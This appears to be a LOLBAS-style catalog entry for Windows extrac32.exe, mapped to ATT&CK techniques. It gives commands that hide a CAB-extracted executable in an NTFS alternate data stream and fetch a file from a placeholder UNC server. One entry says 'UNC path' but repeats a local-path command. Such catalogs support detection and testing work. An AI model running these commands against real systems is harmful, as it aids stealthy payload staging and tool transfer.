.. /Extrac32.exe
Extract to ADS, copy or overwrite a file with Extrac32.exe
Paths:
- C:\Windows\System32\extrac32.exe
- C:\Windows\SysWOW64\extrac32.exe
Alternate data streams
-
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 C:\Windows\Temp\file.cab C:\Windows\Temp\file.ext:file.exe
- Use case
- Extract data from cab file and hide it in an alternate data stream.
- Privileges required
- User
- Operating systems
- Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1564.004: NTFS File Attributes
- Tags
Type: Compression
-
Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
extrac32 C:\Windows\Temp\file.cab C:\Windows\Temp\file.ext:file.exe
- Use case
- Extract data from cab file and hide it in an alternate data stream.
- Privileges required
- User
- Operating systems
- Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1564.004: NTFS File Attributes
- Tags
Type: Compression
Download
-
Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \\servername\C$\Windows\Temp\file.ext C:\Windows\Temp\file.ext
- Use case
- Download file from UNC/WEBDav
- Privileges required
- User
- Operating systems
- Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1105: Ingress Tool Transfer
Copy
-
Command for copying file from one folder to another
extrac32.exe /C C:\Windows\Temp\file.source.exe C:\Windows\Temp\file.dest.exe
- Use case
- Copy file
- Privileges required
- User
- Operating systems
- Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1105: Ingress Tool Transfer